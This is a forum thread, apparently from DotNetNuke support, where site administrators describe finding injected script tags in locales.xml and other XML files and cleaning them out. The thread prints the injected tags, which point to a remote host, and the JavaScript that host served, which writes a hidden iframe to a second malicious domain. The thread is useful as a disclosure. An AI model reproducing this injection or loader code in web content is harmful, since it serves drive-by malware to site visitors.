ok, got tired of waiting for help.  I had a ticket sitting out @ Network Solutions for 3 days now with no results.  Everytime I called, the engineering group was working on it and escalating it.  So I decided to take it upon myself to try and fix it......  (Word to the wise.. know what you are doing and if you don't be patient and don't give up!!!)

The DNN site was at 4.8.4.  I read in some post that others were having a similar problem and they re-installed the version and everything started working.  So I decided to upgrade to 4.9.3  (I could not get 4.9.4 to download from the Downloads page).  Went through the process of copying the correct entries from the original web.config file to the new one to then upload.  Could not get the install to start up.  Instead caused a different error.. after 1/2 day of screwing around, I found out that I deleted teh appsettings opening xml tag in the web.config file... Fixed that and the install ran.  This did not fix the problem.  Do not give up!!!  Customer hacked off so kept digging...  This thread mentioned a locale change to look at for the other user in this thread.  Not knowing too much about it I looked at the app_globalresources folder and the files in there and compared the list to the list in the install package.  I noticed that the website had a file called locales.xml and the install package did not.   I looked at a few of my other sites and noticed they also had this file.  There is not much in it so I backed it up and deleted it and ran the site to see what would happen.   Voila!!!!! the site came up and the locales.xml file was re-created.  Good News!!!

I went back to look at the newly created file and it was smaller that the one I deleted.  I looked at the "original" file I deleted and notice something suspicious in the file.... See Below!

<?xml version="1.0" encoding="UTF-8" ?>
<root>
  <language name="English (United States)" key="en-US" fallback=""/>
</root>
<script src=http://eazypr.com/images/header.gif></script>
<script src=http://eazypr.com/images/header.gif></script>
<script src=http://eazypr.com/images/header.gif></script>

I proceeded (taking the bullet here for you....) to paste that code in my address bar to see what "image" would be displayed.  Instead of an image.... it displayed teh following:

function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 12*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=rtsst;expires="+ Then.toGMTString()
window.status=' ';
document.write("<iframe src=\"http://j.winxyz.com/ww/om.htm\" width=0 height=0></ifame>");
}
}Get();

I decided to leave well enough alone and not track it any farther.  Maybe someone can explain how entries like that would make its way into the locales.xml file in the DNN portal.

Site is back up and running!

Doug

Hi Sebastian,

Funny you should say that.  I went to modify a form a few minutes ago (form Master) and received the mutliple line message in the event log. :(  Apparently all the XML files in the install were affected with this "worm".  Editing them now to remove the same three lines.   Will post more information as I come across it.

Thanks,

Doug

 Doug

I found out that all our XML files have been compromised! It seems like there was a JavaScript code injection that added three random lines (links to some page) on every xml file in the DNN folder structure. Luckily I had the backup files in my computer so I replaced all the "infected" files and now the site is back to normal.

Hope that helps. Please post if the same issue happened to you.

Thanks,
Dren